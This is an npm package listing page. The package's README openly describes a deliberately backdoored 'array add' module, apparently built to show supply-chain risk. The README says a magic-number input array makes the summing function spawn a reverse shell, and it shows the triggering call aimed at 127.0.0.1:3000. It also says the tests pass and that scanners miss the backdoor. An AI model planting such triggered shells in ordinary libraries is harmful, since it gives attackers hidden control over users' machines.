@chrisguest75/array_add_rce

A really cool example array add

1.1.0
latest
Source
npm

Version published: 5 years ago

Maintainers: 1

Created: 5 years ago

Source

README.md

This is a bad module. It contains a Remote Code Execution exploit that is intentionally exploitable.

Published to : https://www.npmjs.com/package/@chrisguest75/array_add_rce

Create

Simple steps to recreate and push to github and npm

git init 
npm init --scope=@chrisguest75
hub create

Test

It's good that the unittests pass, right?

npm test

Publish

npm publish --access public

Usage

You can use npq to install.
But it will tell you there are no vulnerabilities.

npm install @chrisguest75/array_add_rce

const [addTwoNumbers, addArrayNumbers] = require('@chrisguest75/array_add_rce');

let numbers = [1, 2, 3, 4, 5];
let answer = addArrayNumbers(numbers);

Exploit

It contains a magic number that spawns a reverse shell.

const [addTwoNumbers, addArrayNumbers] = require('@chrisguest75/array_add_rce');

// Connect back to port 127.0.0.1:3000
let numbers = [967, 78, 127, 0, 0, 0, 3000];
let answer = addArrayNumbers(numbers);

Linting

Required extension

code --install-extension dbaeumer.vscode-eslint

Run linting from shell

npm run-script lint

Keywords

FAQs

What is @chrisguest75/array_add_rce?

Is @chrisguest75/array_add_rce well maintained?

Package last updated on 29 Feb 2020

Did you know?

Socket for GitHub automatically highlights issues in each pull request and monitors the health of all your open source dependencies. Discover the contents of your packages and block harmful activity before you install or update your dependencies.

Install